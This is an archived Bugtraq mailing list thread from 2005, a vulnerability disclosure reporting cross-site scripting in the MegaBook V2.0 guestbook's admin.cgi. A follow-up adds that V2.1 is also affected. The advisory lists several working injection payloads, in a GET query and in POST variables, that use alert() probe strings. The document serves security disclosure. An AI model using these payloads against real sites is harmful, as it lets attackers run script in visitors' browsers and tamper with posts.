Bugtraq mailing list archives
Re: MegaBook V2.0 - Cross Site Scripting Exploit
From: Spy Hat <spyhat () spyhat com>
Date: 8 May 2005 12:06:01 -0000
In-Reply-To: <20050505104551.23441.qmail () www securityfocus com> The same vulnerability also exist in the new version of MegaBook V2.1
Received: (qmail 6270 invoked from network); 5 May 2005 17:31:03 -0000
Received: from outgoing.securityfocus.com (HELO outgoing3.securityfocus.com) (205.206.231.27)
by mail.securityfocus.com with SMTP; 5 May 2005 17:31:03 -0000
Received: from lists2.securityfocus.com (lists2.securityfocus.com [205.206.231.20])
by outgoing3.securityfocus.com (Postfix) with QMQP
id 8A54C237664; Thu, 5 May 2005 09:22:24 -0600 (MDT)
Mailing-List: contact bugtraq-help () securityfocus com; run by ezmlm
Precedence: bulk
List-Id: <bugtraq.list-id.securityfocus.com>
List-Post: <mailto:bugtraq () securityfocus com>
List-Help: <mailto:bugtraq-help () securityfocus com>
List-Unsubscribe: <mailto:bugtraq-unsubscribe () securityfocus com>
List-Subscribe: <mailto:bugtraq-subscribe () securityfocus com>
Delivered-To: mailing list bugtraq () securityfocus com
Delivered-To: moderator for bugtraq () securityfocus com
Received: (qmail 20731 invoked from network); 5 May 2005 03:18:37 -0000
Date: 5 May 2005 10:45:51 -0000
Message-ID: <20050505104551.23441.qmail () www securityfocus com>
Content-Type: text/plain
Content-Disposition: inline
Content-Transfer-Encoding: binary
MIME-Version: 1.0
X-Mailer: MIME-tools 5.411 (Entity 5.404)
From: Spy Hat <spyhat () spyhat com>
To: bugtraq () securityfocus com
Subject: MegaBook V2.0 - Cross Site Scripting Exploit
The ultimate CGI Guestbook Scripts MegaBook V2.0 appears vulnerable to Cross Site Scripting, which will allow the
attacker to modify the post in the guestbook. The affected scripts is admin.cgi
URL: (http://www.(yourdomain).com/(yourcgidir)/admin.cgi)
I have tested the script with the following query:
?action=modifypost&entryid="><script>alert('wvs-xss-magic-string-703410097');</script>
I have also tested the script with theses POST variables:
action=modifypost&entryid=66&password=<script>alert('wvs-xss-magic-string-188784308');</script>
action=modifypost&entryid=66&password='><script>alert('wvs-xss-magic-string-486624156');</script>
action=modifypost&entryid=66&password="><script>alert('wvs-xss-magic-string-1852691616');</script>
action=modifypost&entryid=66&password=><script>alert('wvs-xss-magic-string-429380114');</script>
action=modifypost&entryid=66&password=</textarea><script>alert('wvs-xss-magic-string-723975367');</script>
Yours,
SpyHat
Current thread:
- MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 05)
- <Possible follow-ups>
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Morning Wood (May 06)
- Re: MegaBook V2.0 - Cross Site Scripting Exploit Spy Hat (May 09)